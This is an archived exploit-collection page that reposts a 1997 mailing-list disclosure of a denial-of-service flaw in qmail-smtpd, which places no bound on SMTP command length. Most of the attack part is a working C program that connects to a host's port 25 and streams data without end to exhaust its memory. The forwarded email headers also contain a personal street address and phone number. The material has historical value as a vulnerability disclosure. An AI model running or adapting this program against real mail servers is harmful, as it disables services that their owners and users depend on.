QMAIL DOS attack #1

Description:A denial of service (DOS) attack against QMAIL, which doesn't set a maximum limit on command length.
Author:wietse@wzv.win.tue.nl (Wietse Venema)
Compromise:Stupid DOS attack.
Vulnerable Systems:Systems running unpatched qmail. This includes a lot of Linux boxes as well as many other systems.
Date:12 June 1997

Date: Thu, 12 Jun 1997 00:20:44 +0200
From: Frank DENIS -Jedi/Sector One- <j@EIDER.NET>
Subject: Denial of service (qmail-smtpd)

Forwarded message:
>From djb-qmail-return-3259-j=4u.net@koobera.math.uic.edu Wed Jun 11 21:31:02 1997
Delivered-To: j@mail.donald.fr
Delivered-To: j@mail-gw.donald.fr
Delivered-To: j-one-j@rtc-one.net
Mailing-List: contact djb-qmail-help@koobera.math.uic.edu; run by ezmlm
Delivered-To: mailing list djb-qmail@koobera.math.uic.edu
Delivered-To: djb-qmail@koobera.math.uic.edu
Message-Id: <199706112130.QAA09923@spike.porcupine.org>
Subject: Denial of service (qmail-smtpd)
To: djb-qmail@koobera.math.uic.edu
Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT)
From: wietse@wzv.win.tue.nl (Wietse Venema)
Organization: Wietse Venema on sabattical leave,
              14 Nosband Avenue 4J, White Plains, NY 10605, USA
X-Phone:      +1 914 948 7129
X-Time-Zone:  USA EST, 6 hours behind central European time
X-Mailer: ELM [version 2.4ME+ PL15 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

While implementing my own mailer, I went over the qmail source code
and noticed that qmail is susceptible to a very trivial denial of
service attack. By sending SMTP commands of unlimited length, an
attacker can make the machine run out of memory, thus rendering it
completely unusable.

Below is a little program that demonstrates the problem.  When I
wrote this I was in C mode; it could probably be done with a much
smaller PERL program.

Fix: put some upper bound on the amount of data that qmail-smtpd
reads per command.

I am sending to the list, because it appears that DJB is ignoring
all my email. Oh well. Be a good sport, Dan, and take care of it.


  * qmail-dos-1 - run a qmail system out of swap space by feeding long SMTP
  * commands.
  * Usage: qmail-dos-1 hostname
  * Author: Wietse Venema. The author is not responsible for abuse of this
  * program. Use at your own risk. Batteries not included.
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>

void    fatal(char *fmt,...)
    va_list ap;

    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    putc('\n', stderr);

int     main(int argc, char **argv)
    struct sockaddr_in sin;
    struct hostent *hp;
    char    buf[BUFSIZ];
    int     sock;
    FILE   *fp;

    if (argc != 2)
        fatal("usage: %s host", argv[0]);
    if ((hp = gethostbyname(argv[1])) == 0)
        fatal("host %s not found", argv[1]);
    memset((char *) &sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
    sin.sin_port = htons(25);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        fatal("socket: %s", strerror(errno));
    if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
        fatal("connect to %s: %s", argv[1], strerror(errno));
    if ((fp = fdopen(sock, "r+")) == 0)
        fatal("fdopen: %s", strerror(errno));
    if (fgets(buf, sizeof(buf), fp) == 0)
        fatal("connection lost");
    memset(buf, 'X', sizeof(buf));
    fseek(fp, 0L, SEEK_SET);
    while (fputs(buf, fp) != EOF)
         /* void */ ;

                  -=-  Frank DENIS aka Jedi/Sector One  -=-
                  <j@djweb.org> <j@donald.fr> <j@eider.net>

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]